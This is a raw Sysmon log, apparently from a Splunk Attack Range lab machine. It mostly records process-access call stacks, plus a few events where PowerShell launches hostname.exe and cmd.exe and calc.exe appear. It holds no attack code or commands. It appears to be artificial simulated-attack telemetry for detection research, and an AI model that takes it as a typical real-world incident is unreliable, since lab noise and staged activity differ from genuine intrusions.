22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360001Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360000Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000359999Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.166{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000360015Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:41.009{8e433fbf-36d8-6013-9803-000000001100}85928004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360016Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:43.306{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360023Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62445200C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1ed62|c:\windows\system32\cbdhsvc.dll+1e9c6|c:\windows\system32\cbdhsvc.dll+1e61e|c:\windows\system32\cbdhsvc.dll+1e289|c:\windows\system32\cbdhsvc.dll+1ef72|c:\windows\system32\cbdhsvc.dll+4063a|c:\windows\system32\cbdhsvc.dll+3e3f7|c:\windows\system32\cbdhsvc.dll+3d956|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360022Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8902-000000001100}6244C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+32810|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360021Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+21ee8|C:\Windows\System32\appresolver.dll+1ef46|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360020Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+1ee93|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360019Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+221c5|C:\Windows\System32\appresolver.dll+1edcc|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360018Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1fb9d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360017Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62445200C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+b4a80|c:\windows\system32\cbdhsvc.dll+1e838|c:\windows\system32\cbdhsvc.dll+1e17e|c:\windows\system32\cbdhsvc.dll+1ef72|c:\windows\system32\cbdhsvc.dll+4063a|c:\windows\system32\cbdhsvc.dll+3e3f7|c:\windows\system32\cbdhsvc.dll+3d956|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360031Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360030Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360029Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360028Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360027Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360026Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360025Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4179|UNKNOWN(00007FFC8EDAE154)
154100x8000000000000000360024Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.989{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\System32\HOSTNAME.EXE10.0.18362.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=612DBA11F1DFAD1998609A647B740B34,SHA256=F88F37BFEFFC80D563B87AD6DE0F65D52D5760882013ABA5ECBE9FAD08D36777,IMPHASH=5CD891320C666621E9783444DB8CBA78{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
10341000x8000000000000000360454Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360453Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360452Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360451Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3)
10341000x8000000000000000360450Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360449Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360448Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0a00-000000001100}9044776C:\Windows\system32\services.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\services.exe+1c74|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360447Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360446Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360445Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
